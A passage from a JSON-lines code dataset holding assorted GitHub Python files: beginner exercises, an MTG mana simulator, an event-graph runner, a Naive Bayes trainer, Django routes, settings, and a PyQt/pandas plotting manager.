pointlesslist[length-1]\n\nfor i in range(0,length-1):\n temp=pointlesslist[i]\n pointlesslist[i]=pointlesslist[i+1]\n pointlesslist[length-1]=temp\n\nfor i in range(0,length-1):\n print(\"The Element\",i,\":-\")\n pointlesslist[i]\n\n\n\n","repo_name":"AnushSomasundaram/Compsci_with_python","sub_path":"compsci_with_python/chap2/trainofelements.py","file_name":"trainofelements.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"40957811576","text":"from Deck import Deck\nimport argparse\n\nfrom Simul import Simul\n\n\ndef main():\n \"\"\"\n PRE:\n 1. Good lands needed\n 2. CMC (Turn allowed)\n 3. Good lands needed <= CMC (Turn allowed)\n i.e: Wrath of god is {2ww}, so --> Good lands needed = 2 (ww colored sources), cmc=4 (Turn to be casted)\n :return:\n \"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument(\"nLands\", help=\"Total number of lands in the deck. (int)\", type=int)\n parser.add_argument(\"cmc\", help=\"CMC of the card desired to cast. (int)\", type=int)\n parser.add_argument(\"colors_needed\", help=\"Number of colored sources to cast the spell. (int)\", type=int, default=0)\n parser.add_argument(\"nCards\", help=\"Total number of cards in the deck. (int)\", type=int, default=60)\n args = parser.parse_args()\n n_lands = args.nLands\n if n_lands <= 3:\n print(\"The number of lands can't be smaller than 4!\")\n return -1\n\n cmc = args.cmc\n if n_lands < cmc:\n print(\"Can't cast a spell without enough lands in the deck!\")\n return -1\n\n n_cards = args.nCards\n if n_lands >= n_cards:\n print(\"The number of lands can't be equal or higher to the number of cards in the deck!\")\n return -1\n colors_needed = args.colors_needed\n simulator = Simul()\n success_rate, curving_landrops, mulligan_rate, good_lands = simulator.start_simul(n_lands, cmc, n_cards,\n colors_needed)\n print(\"Needed good lands: %d, Casting success rate: %f, Curving landrops rate: %f, Mulligan rate: %f\"\n % (good_lands, success_rate, curving_landrops, mulligan_rate))\n return 0\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"CLKBlu3/Mtg_Mana_Optimization","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"36823042170","text":"\"\"\"Runners are actually runtime for statically built graph.\"\"\"\n\nimport time\nimport asyncio\nimport functools\nimport traceback\nfrom typing import List, Type, Deque, Optional, Awaitable, DefaultDict, cast\nfrom collections import deque\n\nfrom blocks.graph import Graph\nfrom blocks.types import Event, Source, Processor, AsyncSource, EventOrEvents, AsyncProcessor\nfrom blocks.logger import logger\n\nSyncProcessors = DefaultDict[Type[Event], List[Processor]]\n\n\nclass Runner(object):\n \"\"\"\n Allows to actually run graph.\n\n - Checks sources for new events,\n - handles internal queue,\n - passes events to a specific processors,\n - check conditions for termination\n - proceeds actual shutdown of the app.\n \"\"\"\n\n def __init__(self, graph: Graph, terminal_event: Optional[Type[Event]]) -> None:\n \"\"\"\n Init runner instance.\n\n :param graph: Computational graph to execute.\n :param terminal_event: Special event which simply stops execution, when processed.\n \"\"\"\n if graph.contains_async_blocks:\n raise RuntimeError('Blocks graph contains async blocks, must be run by AsyncRunner')\n\n self._sources = cast(List[Source], graph.sources)\n self._processors = cast(SyncProcessors, graph.processors)\n self._q: Deque[Event] = deque()\n self._alive = True\n self._terminal_event = terminal_event\n\n def run(self, interval: float, once: bool) -> None:\n \"\"\"\n Start execution.\n\n :param interval: Minimal timeout (seconds) between repetition of the whole computational sequence.\n :param once: If True, executes the whole computational sequence only once, otherwise won't stop until\n specific conditions (such as terminal event) will occur.\n \"\"\"\n self._tick()\n if not once:\n while self._alive:\n start = time.perf_counter()\n self._tick()\n delta = time.perf_counter() - start - interval\n if delta < 0:\n time.sleep(abs(delta))\n self._close_resources()\n\n def stop(self) -> None:\n \"\"\"Stop the execution.\"\"\"\n self._alive = False\n\n def _append_events(self, events: Optional[EventOrEvents]) -> None:\n if events is None:\n return None\n elif isinstance(events, (list, tuple)):\n for event in reversed(events):\n if not self._is_terminal_event(event):\n self._q.appendleft(event)\n elif not self._is_terminal_event(events):\n self._q.appendleft(events)\n\n def _is_terminal_event(self, event: Event) -> bool:\n if self._terminal_event is not None and isinstance(event, self._terminal_event):\n self.stop()\n return True\n return False\n\n def _close_resources(self) -> None:\n self._close_sources()\n self._close_processors()\n\n def _close_sources(self) -> None:\n for source in self._sources:\n source.close()\n\n def _close_processors(self) -> None:\n closed = set()\n for processors in self._processors.values():\n for processor in processors:\n identifier = id(processor)\n if identifier not in closed:\n processor.close()\n closed.add(identifier)\n\n def _get_new_events(self) -> None:\n for source in self._sources:\n self._append_events(source())\n\n def _process_event(self, event: Event) -> None:\n for processor in self._processors[type(event)]:\n try:\n events = processor(event)\n except Exception:\n self.stop()\n logger.error('Execution failed during processing the event: {0}({1}) {2}'.format(\n processor.__class__.__name__, event.__class__.__name__, event,\n ))\n logger.error(traceback.format_exc())\n else:\n self._append_events(events)\n\n def _tick(self) -> None:\n self._get_new_events()\n while self._q:\n event = self._q.popleft()\n self._process_event(event)\n\n\nclass AsyncRunner(object):\n \"\"\"Same as Runner, but for async/await syntax.\"\"\"\n\n def __init__(self, graph: Graph, terminal_event: Optional[Type[Event]]) -> None:\n \"\"\"\n Init async runner instance.\n\n :param graph: Computational graph to execute.\n :param terminal_event: Special event which simply stops execution, when processed.\n \"\"\"\n self._sources = graph.sources\n self._processors = graph.processors\n self._q: Deque[Event] = deque()\n self._alive = True\n self._terminal_event = terminal_event\n\n async def run(self, interval: float, once: bool) -> None:\n \"\"\"\n Start execution.\n\n :param interval: Minimal timeout (seconds) between repetition of the whole computational sequence.\n :param once: If True, executes the whole computational sequence only once, otherwise won't stop until\n specific conditions (such as terminal event) will occur.\n \"\"\"\n await self._tick()\n if not once:\n while self._alive:\n start = time.perf_counter()\n await self._tick()\n delta = time.perf_counter() - start - interval\n if delta < 0:\n await asyncio.sleep(abs(delta))\n await self._close_resources()\n\n def stop(self) -> None:\n \"\"\"Stop the execution.\"\"\"\n self._alive = False\n\n def _append_events(self, events: Optional[EventOrEvents]) -> None:\n if events is None:\n return None\n elif isinstance(events, (list, tuple)):\n for event in events:\n if not self._is_terminal_event(event):\n self._q.append(event)\n elif not self._is_terminal_event(events):\n self._q.append(events)\n\n def _is_terminal_event(self, event: Event) -> bool:\n if self._terminal_event is not None and isinstance(event, self._terminal_event):\n self.stop()\n return True\n return False\n\n async def _close_resources(self) -> None:\n await self._close_sources()\n await self._close_processors()\n\n async def _close_processors(self) -> None:\n closed = set()\n for processors in self._processors.values():\n for processor in processors:\n identifier = id(processor)\n if identifier not in closed:\n if isinstance(processor, AsyncProcessor):\n await processor.close()\n else:\n processor.close()\n closed.add(identifier)\n\n async def _close_sources(self) -> None:\n for source in self._sources:\n if isinstance(source, AsyncSource):\n await source.close()\n else:\n source.close()\n\n async def _get_new_events(self) -> None:\n tasks = []\n loop = asyncio.get_running_loop()\n for source in self._sources:\n if isinstance(source, AsyncSource):\n task: Awaitable[EventOrEvents] = loop.create_task(source())\n else:\n task = loop.run_in_executor(None, source)\n tasks.append(task)\n for events in await asyncio.gather(*tasks):\n self._append_events(events)\n\n async def _process_events(self) -> None:\n loop = asyncio.get_running_loop()\n tasks = []\n while self._q:\n event = self._q.popleft()\n for processor in self._processors[type(event)]:\n if isinstance(processor, AsyncProcessor):\n task: Awaitable[EventOrEvents] = loop.create_task(processor(event))\n else:\n prepared = functools.partial(processor, event)\n task = loop.run_in_executor(None, prepared)\n tasks.append(task)\n\n for events in await asyncio.gather(*tasks):\n self._append_events(events)\n\n if self._q:\n await self._process_events()\n\n async def _tick(self) -> None:\n await self._get_new_events()\n await self._process_events()\n","repo_name":"akoshel/typed-blocks","sub_path":"blocks/runners.py","file_name":"runners.py","file_ext":"py","file_size_in_byte":8361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"33"} +{"seq_id":"33837263305","text":"def contracting(l):\r\n diff=abs(l[0]-l[1])\r\n for i in range(1,len(l)-1):\r\n new_diff=abs(l[i]-l[i+1])\r\n if new_diffl[i+1] and l[i]>l[i-1]:\r\n hc+=1\r\n elif l[i] C3\r\n for j in range(n // 2):\r\n for i in range(n):\r\n m[i][j], m[i][n - 1 - j] = m[i][n - 1 - j], m[i][j]\r\n #transposing the matrix\r\n for i in range(n):\r\n for j in range(i):\r\n m[i][j], m[j][i] = m[j][i], m[i][j]\r\n return m\r\n","repo_name":"arwazkhan189/NPTEL---Programming-Data-Structures-And-Algorithms-Using-Python","sub_path":"Week 3/Week 3 Assignment.py","file_name":"Week 3 Assignment.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"33"} +{"seq_id":"30643727583","text":"import numpy as np\r\nimport features\r\nimport os\r\nimport pickle\r\n\r\nroots = ['C', 'Db', 'D', 'Eb', 'E', 'F', 'F#', 'G', 'Ab', 'A', 'Bb', 'B']\r\nchords_type = ['', 'm']\r\nchords = [x+y for x in roots for y in chords_type]\r\nchords.append('-')\r\nchords_dict = {k: v for v, k in enumerate(sorted(set(chords)))} # total 25 chords\r\n\r\n\r\ndef wav_list_to_feature_list(wav_list):\r\n '''\r\n :param wav_list: lsit of the wav files\r\n :return: list of valid wav files and features\r\n '''\r\n valid_wav_list = []\r\n features_list = []\r\n for wav_path in wav_list:\r\n feature = features.compute_mfcc_example(wav_path)\r\n if feature is not None:\r\n valid_wav_list.append(wav_path)\r\n features_list.append(feature)\r\n else:\r\n print(wav_path)\r\n\r\n return valid_wav_list, features_list\r\n\r\n\r\ndef get_wav_list(data_path, chord_path):\r\n '''\r\n :param data_path: data directory\r\n :param data_path: chord dictionary path\r\n :return: list of wav file paths\r\n '''\r\n paths = []\r\n with open(chord_path, 'rb') as f:\r\n chords = pickle.load(f)\r\n for path, _, files in os.walk(data_path):\r\n for file in files:\r\n if file.endswith('.wav') and len(chords[file]) == 96:\r\n paths.append(path + '/' + file)\r\n\r\n return paths\r\n\r\n\r\ndef get_label_list(chord_path, wav_paths):\r\n '''\r\n :param chord_path: path of the chord info file\r\n :param wav_paths: paths of wav files\r\n :return: list of labels of wav files (each wav file has 96 chords)\r\n '''\r\n label_list = []\r\n with open(chord_path, 'rb') as f:\r\n chord_dict = pickle.load(f)\r\n\r\n for path in wav_paths:\r\n wav_name = path[path.rfind('/')+1:] # Maybe need to change '/' to another character\r\n\r\n label_list.append(chord_dict[wav_name])\r\n\r\n return label_list\r\n\r\n\r\ndef encode_label(labels):\r\n '''\r\n :param labels: labels from the same wav file\r\n :return: numpy array with (96, number of labels) shape, one-hot encoded\r\n '''\r\n\r\n # create one-hot encoded array\r\n label_array = np.zeros((len(labels), len(chords_dict)), dtype=np.int32)\r\n for i, label in enumerate(labels):\r\n label_pos = chords_dict[label]\r\n label_array[i, label_pos] = 1\r\n return label_array\r\n\r\n\r\n\r\n\r\n","repo_name":"jiminsun/IAML_2018","sub_path":"Project3/dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":2285,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"38127764711","text":"#!/usr/local/bin/python3.9\n\n# Filnamn: kap. 9, sid. 109 - returvärde.py\n\n# Kapitel 9 - Funktioner\n# Programmering 1 med Python - Lärobok\n\n# Funktioner med returvärde \n\n# Beräkna och returnera medianen av en numerisk lista \ndef median(lista):\n # Vi börjar med att sortera listan för att hitta det mellersta värdet \n lista.sort() # sort() är en inbyggd metod/funktion i Python\n # Är det ett udda eller jämt antal numeriska argument så ska medianen tas \n # fram på olika sätt\n if len(lista) % 2:\n # Index måste vara av typen heltal när jag sedan använder det som \n # argument till lista, därav heltalsdivision\n index = len(lista) // 2 # För att få fram index för mellersta talet\n median = float(lista[index]) # Hämta median värdet\n else:\n # Är listan jämn i antal måste en medelberäkning ske på de två \n # mellersta talen\n index = (len(lista) // 2)-1 # För att få fram index för det första talet\n median = float((lista[index] + lista[index + 1]) / 2)\n return median\n\n# Huvudprogram\nlistaEtt = [4, 5, 6] \nlistaTvå = [3, 5, 7, 9] \nprint('Medianen för listaEtt:', listaEtt, 'är', median(listaEtt))\nprint('Medianen för listaTvå:', listaTvå, 'är', median(listaTvå))\n","repo_name":"niklasengvall/programmering1python","sub_path":"Lärobok/kap 9/kap. 9, sid. 109 - returvärde.py","file_name":"kap. 9, sid. 109 - returvärde.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"sv","doc_type":"code","stars":8,"dataset":"github-code","pt":"33"} +{"seq_id":"40760217540","text":"\"\"\"\nFaça um programa que converta da notação de 24 horas para a notação de 12 horas. Por exemplo, o programa deve converter\n14:25 em 2:25 P.M. A entrada é dada em dois inteiros. Deve haver pelo menos duas funções: uma para fazer a conversão e\numa para a saída. Registre a informação A.M./P.M. como um valor ‘A’ para A.M. e ‘P’ para P.M. Assim, a função para\nefetuar as conversões terá um parâmetro formal para registrar se é A.M. ou P.M. Inclua um loop que permita que o usuário\nrepita esse cálculo para novos valores de entrada todas as vezes que desejar.\n\n\"\"\"\n\n\ndef converte_horas(horas, minutos):\n lista_horas1 = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12]\n lista_horas2 = [13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24]\n if horas in lista_horas1:\n print(f'{horas}:{minutos} AM')\n if horas in lista_horas2:\n indice = lista_horas2.index(horas)\n print(f'{lista_horas1[indice]}:{minutos} PM')\n\n\nwhile True:\n\n print(\"Conversor de horas, formato 24 horas para 12 horas.\\n\")\n hora = int(input('Digite a hora: '))\n minuto = int(input('Digite os minutos: \\n'))\n\n converte_horas(hora, minuto)\n print()\n outro = input('Deseja inserir outro horario? [S/N]: ').strip().upper()\n if outro == 'N':\n print(\"Programa finalizado!\")\n break\n if outro not in 'SN':\n print(\"Opção invalida, programa finalizado.\")\n break\n","repo_name":"MrSpock1994/ExerciciosFuncoes","sub_path":"6.py","file_name":"6.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"9437930168","text":"### GENERAL SETTINGS ###\nPORT = 7000\nSENTRY_DSN = None\nMAX_FILE_SIZE = None\nHMAC_KEY = 'CHANGEME'\nIGNORE_CALLBACK_SSL = False\nREQUIRE_SIGNED_SUBMITIONS = False\nBROKER_URL = 'amqp://archiver:archiver@192.168.111.112//'\nCALLBACK_ADDRESS = [\n 'http://192.168.111.111:7000/callback',\n 'http://192.168.111.1:5000/api/v1/registration/finished/'\n]\n\n\n### Credentials Options ###\nUSERNAME = 'CHANGEME' # Access key\nPASSWORD = 'CHANGEME' # Secret key\nCONTAINER_NAME = 'CHANGEME' # Bucket name\n\n\n### LibCloud Options ###\nLIBCLOUD_DRIVER = 's3_us_west_oregon'\n\n\n#### FILE STORAGE OPTIONS ####\nBACKEND = 's3' # Options: S3,\nCREATE_PARITIES = True\nIGNORE_PARITIY_SIZE_LIMIT = False\n\n\n#### FILE STORAGE LOCATIONS ####\nFILES_DIR = 'Files/'\nMANIFEST_DIR = 'Manifests/'\nMETADATA_DIR = 'File Metadata/'\nDIRSTRUCT_DIR = 'Directory Structures/'\nPARITY_DIR = 'Parities/'\n\n\n### DEBUGGING OPTIONS ###\nDEBUG = True\nCELERY_SYNC = False # Dont use celery just run everything synchronously\nDUMP_INCOMING_JSON = False\n\n\n#### CELERY OPTIONS ####\nCELERY_TASK_SERIALIZER = 'pickle'\nCELERY_RESULT_SERIALIZER = 'pickle'\nCELERY_ACCEPT_CONTENT = ['pickle', 'json', 'msgpack', 'yaml']\nCELERY_CHORD_PROPAGATES = False\nCELERY_EAGER_PROPAGATES_EXCEPTIONS = CELERY_SYNC\nCELERY_ALWAYS_EAGER = CELERY_SYNC\nCELERY_RESULT_BACKEND = 'amqp'\nCELERY_TASK_RESULT_EXPIRES = 18000 # 5 hours.\nCELERY_TRACK_STARTED = True\nCELERY_IMPORTS = 'archiver.worker.tasks'\nCELERY_REDIRECT_STDOUTS_LEVEL = 'INFO'\nCELERY_ACKS_LATE = True\n# Only process 5k jobs per hour\n# This is to deal with API rate limiting\nCELERY_DEFAULT_RATE_LIMIT = '5000/h'\n\n#### CLONER OPTIONS ####\n# Figshare\nFIGSHARE_OAUTH_TOKENS = [\n 'CLIENT ID',\n 'CLIENT SECRET'\n]\n","repo_name":"chennan47/Archiver","sub_path":"archiver/settings/defaults.py","file_name":"defaults.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"33"} +{"seq_id":"42162181151","text":"\nfrom django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path(\"\", views.index, name=\"index\"),\n path(\"login\", views.login_view, name=\"login\"),\n path(\"logout\", views.logout_view, name=\"logout\"),\n path(\"register\", views.register, name=\"register\"),\n path(\"create_post\", views.create_post, name=\"create_post\"),\n path(\"profile/\", views.profile, name=\"profile\"),\n path(\"following\", views.following, name=\"following\"),\n path(\"follow/\", views.follow, name=\"follow\"), \n path(\"follow_status/\", views.follow_status, name=\"follow_status\"),\n path(\"save_post/\", views.save_post, name=\"save_post\"),\n path(\"like_unlike_post/\", views.like_unlike_post, name=\"like_unlike_post\"),\n path(\"count_likes/\", views.count_likes, name=\"count_likes\")\n]\n","repo_name":"b00gyv00gy/web50-projects-2020-x-network","sub_path":"network/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"31697731456","text":" \n\"\"\"\nBoolean or Bool is a type a constants( e.g integer, float).\nit has only 2 values. True with captial T. And, False with capital F.\n\"\"\"\ndef booleanUse(x):#call like booleanUse(False)\n y = True# example of varible assingment by boolean\n print(y)\n\n if x:# example of using boolean DIRECTLY as condition. Same as x == True condition below\n print('true string')\n else:\n print('false string')\n\n if x == True:# example of using boolean INDIRECTLY as condition\n print('true string again')\n else:\n print('false string again')\n\n\"\"\"\nstring is a type of constant in python\ndefined inside single or double quotes\nstringVariable = 'Hello world'\nstring is created using individual characters like above string has first character as 'H'\n\"\"\"\n\ndef stringOperations(x):\n #prints all character of string\n for i in x:\n print(i)\n \n #length of string\n print(len(x))\n\n #accessing a character in string using square brackets [], string is a array of characters and its first character is at 0 and last at length - 1\n print(x[0])#first character\n print(x[ len(x) - 1])#last character\n\n #square brackets can also be used to print all characters in string as following\n #\"IndexError: string index out of range\" if you access a charcter a location more than string length\n j = 0\n while j < len(x):\n print(x[j])\n j+=1\n \n # concatenation two or more strings using + operator\n print( x + \" garima\")\n print( x + \" garima\" +\" mehra\")\n\n # more operations on sting can be found at https://www.w3schools.com/python/python_strings.asp\n\n\n\ndef char_k(x,y):\n if (x[y-1] == 'k'):\n return True\n else:\n return False \n\n\ndef start_end(x,y):\n if (x[y-1] == x[-y]):\n return True\n else:\n return False \n\n\ndef rev_string(x):\n i = 0\n response = ''\n while (i < len(x)):\n response += x[-(i+1)]\n i=i+1\n #print(response)\n return response\n\n\"\"\"\nx 'ankit'\ni 0, 1, 2, 3, 4\nresponse '', 't', 'ti', 'tik', 'tikn', 'tikna'\n\"\"\"\n\n\ndef palindrome(x):\n response ='False'\n i=0\n count=0\n while (i < len(x)/2):\n if (x[i] == x[-(i+1)]):\n count=count+1\n i=i+1\n if ( (len(x)%2 == 0) and (count == len(x)/2) ) or ( (len(x)%2!= 0) and (count== (len(x)+1)/2) ):\n response ='True'\n print(response) \n\n\ndef palindrome_v2(x):\n response = 'True'\n i=0\n while (i < len(x)/2):\n if(x[i] != x[-(i+1)]):\n response = 'False' \n break \n i=i+1\n print(response) \n\n\ndef palindrome_v3(x):\n if( x == rev_string(x)):\n print('true')\n else:\n print('false') \n\n\n\n\n\n \n","repo_name":"GarimaMehra/learn_python","sub_path":"BooleansAndString.py","file_name":"BooleansAndString.py","file_ext":"py","file_size_in_byte":2507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"31181307944","text":"#!usr/bin/python\nimport sys\nimport math\nimport os\nimport numpy as np\nfrom collections import defaultdict\nfrom collections import Counter\nimport glob\nimport re\nimport string\nfrom tfidf import *\nfrom preprocess import *\n\n\"\"\"\nTraining file for Naive Bayes program for CSCI 544.\n\nAuthor: Leigh Yeh\nDate: 1/31/2019\nUniversity of Southern California\n\"\"\"\n\ndef load_data():\n all_files = glob.glob(os.path.join(input_path, '*/*/*/*.txt'))\n train = []\n positive_train = []\n truthful_train = []\n\n for file_ in all_files:\n class1, class2, fold, fname = file_.split('/')[-4:]\n text = open(file_).read()\n train.append(text)\n positive_train.append(1) if 'positive' in class1 else positive_train.append(0)\n truthful_train.append(1) if 'truthful' in class2 else truthful_train.append(0)\n\n train = clean(train)\n return train, positive_train, truthful_train\n\ndef get_vocab(text):\n vocab = []\n for doc in text:\n for word in tokenize(doc):\n if word not in stopwords:\n vocab.append(word)\n return list(set(vocab))\n\n\ndef fit(X, y_pos, y_truth):\n label_count = defaultdict(float)\n log_priors = defaultdict(float)\n word_counts = defaultdict(dict)\n n = len(X)\n\n count_pos = Counter(y_pos)\n count_truth = Counter(y_truth)\n label_count['pos'] = count_pos[1]\n label_count['neg'] = count_pos[0]\n label_count['truth'] = count_truth[1]\n label_count['deceptive'] = count_truth[0]\n\n log_priors['pos'] = math.log(label_count['pos'] / n)\n log_priors['neg'] = math.log(label_count['neg'] / n)\n log_priors['truth'] = math.log(label_count['truth'] / n)\n log_priors['deceptive'] = math.log(label_count['deceptive'] / n)\n \n # TODO: calculate tfidf vec for each document, then add THAT value instead of just count (rn it's a BoW rep.)\n for text, pos_label, truth_label in zip(X, y_pos, y_truth):\n label1 = 'pos' if pos_label == 1 else 'neg'\n label2 = 'truth' if truth_label == 1 else 'deceptive'\n doc_counts = dict(word_count(tokenize(text)))\n for word, count in doc_counts.items():\n if word in stopwords:\n continue;\n if word not in word_counts[label1]:\n word_counts[label1][word] = 0.0\n if word not in word_counts[label2]:\n word_counts[label2][word] = 0.0\n word_counts[label1][word] += count\n word_counts[label2][word] += count\n return word_counts, log_priors, label_count\n \n\ndef write(write_file):\n columns = ['word','positive', 'negative', 'truthful', 'deceptive']\n write_file.write('-------log priors--------\\n')\n write_file.write('positive, negative, truthful, deceptive\\n')\n log_list = [str(log_priors['pos']), str(log_priors['neg']), str(log_priors['truth']), str(log_priors['deceptive'])] \n write_file.write(','.join(log_list))\n write_file.write('\\n')\n write_file.write('----loglikelihoods for each word and label----\\n')\n write_file.write(','.join(columns))\n write_file.write('\\n')\n\n\n\ndef train():\n write_file = open('nbmodel.txt', 'w')\n write(write_file)\n\n loglikelihood = defaultdict(dict)\n for word in vocab:\n loglikelihood['pos'][word] = math.log((word_counts['pos'].get(word, 0.0) + 1) / (label_count['pos'] + len(vocab)))\n loglikelihood['neg'][word] = math.log((word_counts['neg'].get(word, 0.0) + 1) / (label_count['pos'] + len(vocab)))\n loglikelihood['truth'][word] = math.log((word_counts['truth'].get(word, 0.0) + 1) / (label_count['pos'] + len(vocab)))\n loglikelihood['deceptive'][word] = math.log((word_counts['deceptive'].get(word, 0.0) + 1) / (label_count['pos'] + len(vocab)))\n row = [word, str(loglikelihood['pos'][word]), str(loglikelihood['neg'][word]), str(loglikelihood['truth'][word]), str(loglikelihood['deceptive'][word])]\n write_file.write(','.join(row))\n write_file.write('\\n')\n write_file.flush()\n write_file.close()\n\n\nif __name__=='__main__':\n input_path = sys.argv[-1]\n \n X_train, y_train_pos, y_train_truth = load_data()\n\n stopwords = get_stopwords(X_train)\n vocab = get_vocab(X_train)\n word_counts, log_priors, label_count = fit(X_train, y_train_pos, y_train_truth)\n train()\n \n\n\n","repo_name":"lpyeh/USC-CS544","sub_path":"nblearn.py","file_name":"nblearn.py","file_ext":"py","file_size_in_byte":4280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"38136079499","text":"from django.urls import path\nfrom . import views\nurlpatterns = [\n path('todos/', views.TodoListAPIView.as_view(), name='todos_list'),\n path('signup/', views.signup, name='signup'),\n path('login/', views.login, name='login'),\n path('logout/', views.logout, name='logout'),\n path('create/', views.TodoCreateView.as_view(), name='create'),\n path('update//', views.TodoUpdateView.as_view(), name='update'),\n path('detail//', views.TodoDetailView.as_view(), name='detail'),\n path('delete//', views.delete, name='delete'),\n path('complete//', views.complete, name='complete'),\n\n]\n","repo_name":"ikegabriel/todo_api","sub_path":"todo_api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"22720337966","text":"DEBUG=False\r\n\r\ntry:\r\n from PyQt5 import QtCore\r\n from PyQt5.QtCore import QObject\r\n\r\n from PyQt5.QtWidgets import (\r\n QApplication,\r\n QWidget,\r\n QMainWindow,\r\n QMessageBox,\r\n QTabWidget,\r\n QVBoxLayout,\r\n QHBoxLayout,\r\n QLabel,\r\n QLineEdit,\r\n QPushButton,\r\n QScrollArea,)\r\nexcept ImportError as e:\r\n print(\"------------------------------\")\r\n print(\"| ERROR |\")\r\n print(\"------------------------------\")\r\n print(\"| Error importing PyQt5. |\")\r\n print(\"| Install PyQt5: |\")\r\n print(\"| 'pip install PyQt5' |\")\r\n print(\"| or |\")\r\n print(\"| 'conda install pyqt' |\")\r\n print(\"------------------------------\")\r\n raise e\r\n\r\nimport pandas\r\n\r\nimport matplotlib\r\nimport matplotlib.pyplot as plt\r\nimport sys\r\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigCanvas\r\nfrom matplotlib.backends.backend_qt5agg import NavigationToolbar2QT as NavBar\r\nfrom matplotlib.widgets import MultiCursor\r\n\r\nimport pyperclip\r\n\r\nimport re\r\n\r\nclass TagInfoRule():\r\n def __init__(self,expr,color=None,sub=r'\\1'):\r\n self.expr = expr\r\n self.rexpr = re.compile(expr)\r\n self.sub = sub\r\n self.color = color\r\n\r\n def get_groupid(self,tagname):\r\n m = self.rexpr.match(tagname)\r\n if m:\r\n if self.sub:\r\n return True, self.rexpr.sub(self.sub,tagname)\r\n else:\r\n return True, None\r\n else:\r\n return False, None\r\n \r\n \r\nclass PlotInfo():\r\n '''\r\n Contains information about one axes.\r\n\r\n Parameters\r\n ----------\r\n tagnames : list\r\n list of tagnames\r\n ax : matplotlib.pyplot.axis\r\n the axis this plotinfo is for\r\n groupid : string\r\n the groupid of this plotinfo/ax\r\n '''\r\n def __init__(self,tagname,groupid,ax):\r\n self.tagnames = [tagname]\r\n self.ax = ax\r\n self.groupid = groupid\r\n\r\nclass TagInfo():\r\n '''\r\n Info about tags (columns in dataframe)\r\n\r\n Attributes:\r\n -----------\r\n name : str\r\n tagname\r\n plotinfo : PlotInfo\r\n info about plot, None if not plotted\r\n groupid : str\r\n tag group id\r\n color : str\r\n color of plot\r\n\r\n '''\r\n\r\n taginfo_rules = [\r\n TagInfoRule(expr=r'(.*)\\.PV$',color='C0'),\r\n TagInfoRule(expr=r'(.*)\\.MEAS$',color='C0'),\r\n TagInfoRule(expr=r'(.*)\\.SP$',color='C1'),\r\n TagInfoRule(expr=r'(.*)\\.SPT$',color='C1'),\r\n ]\r\n\r\n def __init__(self,tagname):\r\n '''\r\n Constructor\r\n\r\n Parameters:\r\n -----------\r\n tagname : str\r\n name of tag\r\n '''\r\n\r\n self.name = tagname\r\n self.plotinfo = None # points to a plotinfo if tag is plotted\r\n\r\n self.groupid = None\r\n self.color = None\r\n for rule in self.taginfo_rules:\r\n match, gid = rule.get_groupid(self.name)\r\n if match:\r\n if DEBUG:\r\n print('Rule match {} - {}'.format(tagname,rule.expr))\r\n self.groupid=gid\r\n self.color = rule.color\r\n break\r\n\r\n\r\n def set_color(self,color):\r\n sys.stderr.write(\"changing colors is not implemeted yet.\\n'\")\r\n return\r\n\r\n\r\nclass PlotManager(QObject):\r\n '''\r\n Class that manages all the plots.\r\n\r\n '''\r\n\r\n def __init__(self,parent=None):\r\n QObject.__init__(self,parent)\r\n\r\n self._df = None\r\n self.plot_window = PlotWindow()\r\n self.plot_window.home_zoom_signal.connect(self.home_zoom)\r\n\r\n self._plotinfo = [] # list of info about plot\r\n self._groupid_plots = {} # dictionary of plotted groupids\r\n self._taginfo = {} # dictionary of tags\r\n\r\n self.cur = None\r\n\r\n self.legend_loc = 'upper left'\r\n self.legend_fontsize = 8\r\n\r\n def set_dataframe(self,df):\r\n # package function set_dataframe checks that the index is datetime index\r\n\r\n # clear the _taginfo to avoid unnecesary looping in clear_all_plots\r\n self._taginfo.clear()\r\n self.clear_all_plots()\r\n\r\n # Check if there are duplicated columns:\r\n dupcols = df.columns[ df.columns.duplicated() ]\r\n if len(dupcols) > 0:\r\n sys.stderr.write('WARNING: Dataframe has duplicated columns, duplicates are being dropped.\\n')\r\n for c in dupcols:\r\n sys.stderr.write(' Dropping {}\\n'.format(c))\r\n\r\n self._df = df.drop(columns=dupcols)\r\n\r\n for tag in self._df:\r\n # Check if we can plot the tag\r\n dt = self._df[tag].dtype\r\n if dt in (float,int,bool,'int64'):\r\n self._taginfo[tag] = TagInfo(tag)\r\n else:\r\n if DEBUG:\r\n print('Tag {} is not plottable'.format(tag))\r\n print(' dtype is {}'.format(dt))\r\n continue\r\n\r\n\r\n def get_tagtools(self):\r\n '''\r\n Get tagtools of all validated _taginfos\r\n '''\r\n tools = [ TagTool(t) for t in self._taginfo ]\r\n for tool in tools:\r\n tool.add_remove_plot.connect(self.add_remove_plot)\r\n\r\n return tools\r\n \r\n\r\n 